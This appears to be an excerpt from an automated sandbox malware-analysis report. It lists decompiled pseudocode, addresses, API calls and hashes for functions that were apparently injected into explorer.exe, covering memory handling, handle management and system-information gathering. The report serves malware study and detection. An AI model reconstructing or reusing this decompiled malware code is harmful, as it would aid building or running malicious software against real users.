        • Opcode Fuzzy Hash: ca1f85b10fce3d7ab917c7b8650cfc21e56fba2a81fbb79344a5bac3ebb63321
        • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008896F, Relevance: 1.4, APIs: 1, Instructions: 107stringCOMMON
        Download Yara Rule
        C-Code - Quality: 97%
        			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E00088604(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E00088604(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000887EA(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E0008861A( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0x9e684; // 0x133f8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E0008861A(_t73, 0);
						}
						E0008861A( &_v20, 0);
						goto L1;
					}
					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0x9e684; // 0x133f8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E0008861A( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}
















        0x00088975
        0x0008897c
        0x0008897e
        0x00088986
        0x00088988
        0x00088990
        0x00088992
        0x00088995
        0x00088998
        0x000889ac
        0x000889b3
        0x000889b9
        0x000889c2
        0x00088a1a
        0x00088a1f
        0x00088a28
        0x00088a75
        0x00088a78
        0x00088a80
        0x00088a84
        0x00088a84
        0x00088a89
        0x00000000
        0x00088a89
        0x00088a2a
        0x00088a2c
        0x00088a34
        0x00088a3a
        0x00088a3b
        0x00088a3b
        0x00088a43
        0x00088a46
        0x00088a4b
        0x00088a4b
        0x00088a4e
        0x00088a57
        0x00088a5c
        0x00088a62
        0x00088a69
        0x00000000
        0x00088a6f
        0x000889cb
        0x000889d0
        0x000889d2
        0x000889d9
        0x00000000
        0x00000000
        0x000889ee
        0x00000000
        0x000889f0
        0x000889f0
        0x000889fb
        0x000889fe
        0x00088a0b
        0x00000000
        0x00088a11
        0x000889ee
        0x0008899a
        0x00000000

        APIs
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateHeaplstrcpyn
        • String ID:
        • API String ID: 680773602-0
        • Opcode ID: 5beacecdb8d78057d78b25741919f4baf88fb2d4c825de191405f0dc12551294
        • Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
        • Opcode Fuzzy Hash: 5beacecdb8d78057d78b25741919f4baf88fb2d4c825de191405f0dc12551294
        • Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008E2C6, Relevance: 1.3, APIs: 1, Instructions: 92sleepCOMMON
        Download Yara Rule
        C-Code - Quality: 75%
        			E0008E2C6(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0x9e6b4; // 0x133fa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0x9e6b4; // 0x133fa98
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0x9e68c; // 0x133fab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E00088604(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0x9e68c; // 0x133fab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}





















        0x0008e2c6
        0x0008e2d9
        0x0008e2e0
        0x0008e2e9
        0x0008e2f1
        0x0008e2f7
        0x0008e2fc
        0x0008e307
        0x0008e30c
        0x0008e3a5
        0x0008e3a5
        0x0008e3ad
        0x00000000
        0x0008e3b2
        0x0008e313
        0x0008e316
        0x0008e31d
        0x0008e32d
        0x0008e333
        0x0008e343
        0x0008e348
        0x0008e34d
        0x0008e354
        0x0008e358
        0x0008e35f
        0x0008e363
        0x0008e367
        0x0008e368
        0x0008e36b
        0x0008e370
        0x0008e379
        0x0008e385
        0x0008e38f
        0x0008e394
        0x0008e394
        0x0008e379
        0x0008e39a
        0x0008e39b
        0x00000000
        0x0008e3a4
        0x00000000

        APIs
        • Sleep.KERNELBASE(0000000A), ref: 0008E394
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Sleep
        • String ID:
        • API String ID: 3472027048-0
        • Opcode ID: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
        • Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
        • Opcode Fuzzy Hash: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
        • Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008A3ED, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}













        0x0008a3ed
        0x0008a3f6
        0x0008a3f8
        0x0008a3fa
        0x0008a3fe
        0x0008a400
        0x0008a408
        0x0008a40f
        0x0008a418
        0x0008a41d
        0x0008a422
        0x0008a446
        0x0008a44b
        0x0008a451
        0x0008a45d
        0x0008a462
        0x0008a424
        0x0008a42d
        0x0008a443
        0x00000000
        0x0008a42f
        0x0008a43b
        0x0008a440
        0x0008a42d
        0x0008a422
        0x0008a465
        0x0008a466
        0x0008a400
        0x0008a470

        APIs
          • Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782
        • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: ErrorLast
        • String ID:
        • API String ID: 1452528299-0
        • Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
        • Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
        • Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
        • Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00085D7D, Relevance: 1.3, APIs: 1, Instructions: 49stringCOMMON
        Download Yara Rule
        C-Code - Quality: 95%
        			E00085D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0x9e684; // 0x133f8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0x9e688; // 0xb0000
					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0x9e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00089EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0x9e688; // 0xb0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0x9e684; // 0x133f8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}















        0x00085d80
        0x00085d95
        0x00085d9e
        0x00085da7
        0x00085da9
        0x00085db1
        0x00085dc1
        0x00085dcf
        0x00085dd4
        0x00085dd9
        0x00085ddb
        0x00085ddd
        0x00085de2
        0x00085de4
        0x00085dff
        0x00085dff
        0x00085de6
        0x00085de7
        0x00085df2
        0x00085dfa
        0x00085dfc
        0x00085dfc
        0x00085de4
        0x00085e01
        0x00085db3
        0x00085db4
        0x00085db9
        0x00085dbe
        0x00085dbe
        0x00085e05

        APIs
        • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: lstrcmpi
        • String ID:
        • API String ID: 1586166983-0
        • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
        • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
        • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
        • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008BA05, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0008BA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x9e68c; // 0x133fab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E0008B998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x9e684; // 0x133f8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}












        0x0008ba0a
        0x0008ba12
        0x0008ba1a
        0x0008ba1f
        0x0008ba29
        0x0008ba32
        0x0008ba37
        0x0008ba3c
        0x0008ba5a
        0x0008ba5d
        0x0008ba3e
        0x0008ba41
        0x0008ba43
        0x0008ba4b
        0x0008ba4b
        0x0008ba4e
        0x0008ba4e
        0x0008ba61
        0x0008ba22
        0x0008ba22
        0x0008ba22

        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
        • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
        • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
        • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00085CEC, Relevance: 1.3, APIs: 1, Instructions: 38COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0x9e688; // 0xb0000
				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000885EF();
				E00088F78();
				 *0x9e780 = 0;
				 *0x9e784 = 0;
				 *0x9e77c = 0;
				E00085EB6(); // executed
				E0008CF84(_t24);
				_t14 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E0008B337( &_v44);
				memset( &_v44, 0, 0x27);
				E00085C26( &_v44, __fp0);
				_t21 =  *0x9e684; // 0x133f8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}











        0x00085cec
        0x00085cec
        0x00085cef
        0x00085cfe
        0x00085d03
        0x00085d08
        0x00085d0f
        0x00085d15
        0x00085d1b
        0x00085d21
        0x00085d26
        0x00085d2b
        0x00085d33
        0x00085d3d
        0x00085d4b
        0x00085d53
        0x00085d5f
        0x00085d67
        0x00085d6c
        0x00085d72
        0x00085d7c

        APIs
          • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
          • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
          • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
          • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
          • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
          • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
          • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
        • memset.MSVCRT ref: 00085D5F
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
        • String ID:
        • API String ID: 4245722550-0
        • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
        • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
        • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
        • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008861A, Relevance: 1.3, APIs: 1, Instructions: 33memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0008861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E0008C392(_t9);
						}
					} else {
						_t4 = E0008C379(_t9);
					}
					E0008874F(_t9, 0, _t4);
					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
				}
				return _t3;
			}






        0x0008861d
        0x00088622
        0x00088668
        0x00088668
        0x00088625
        0x00088629
        0x0008862b
        0x0008862e
        0x00088634
        0x00088642
        0x00088646
        0x00088646
        0x00088636
        0x00088637
        0x0008863c
        0x0008864f
        0x00088660
        0x00088660
        0x00000000

        APIs
        • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: FreeHeap
        • String ID:
        • API String ID: 3298025750-0
        • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
        • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
        • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
        • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008A77D, Relevance: 1.3, APIs: 1, Instructions: 29COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E0008A5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E0008A65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}








        0x0008a786
        0x0008a787
        0x0008a78c
        0x0008a790
        0x0008a79f
        0x0008a7a7
        0x0008a7b4
        0x00000000
        0x0008a7b7
        0x0008a7ab
        0x00000000
        0x0008a7ab
        0x00000000

        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
        • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
        • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
        • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000898A6, Relevance: 1.3, APIs: 1, Instructions: 27COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000898A6(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
					CloseHandle( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E0008984A(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}




        0x000898aa
        0x000898bc
        0x000898ca
        0x000898d7
        0x000898da
        0x000898e1
        0x000898e1
        0x00000000
        0x000898e6
        0x00000000

        APIs
        • CloseHandle.KERNELBASE(?), ref: 000898CA
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
        • Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
        • Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
        • Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008B337, Relevance: 1.3, APIs: 1, Instructions: 25COMMON
        Download Yara Rule
        C-Code - Quality: 89%
        			E0008B337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x9e684; // 0x133f8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x9e684; // 0x133f8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}








        0x0008b337
        0x0008b33f
        0x0008b344
        0x0008b34a
        0x0008b34e
        0x0008b350
        0x0008b355
        0x0008b35e
        0x0008b362
        0x0008b362
        0x0008b36a
        0x00000000
        0x0008b36d
        0x0008b371

        APIs
        • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
        • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
        • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
        • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 0008D01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282COMMON
        Download Yara Rule
        C-Code - Quality: 86%
        			E0008D01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x9e69c; // 0x10000000
				_t81 = E00088604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x9e684; // 0x133f8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E0008BA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E0008BB8D( *_t88) == 0) {
					_t90 = E0008BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0x9e68c; // 0x133fab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0x9e694; // 0x133fa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E0008B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E0008B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
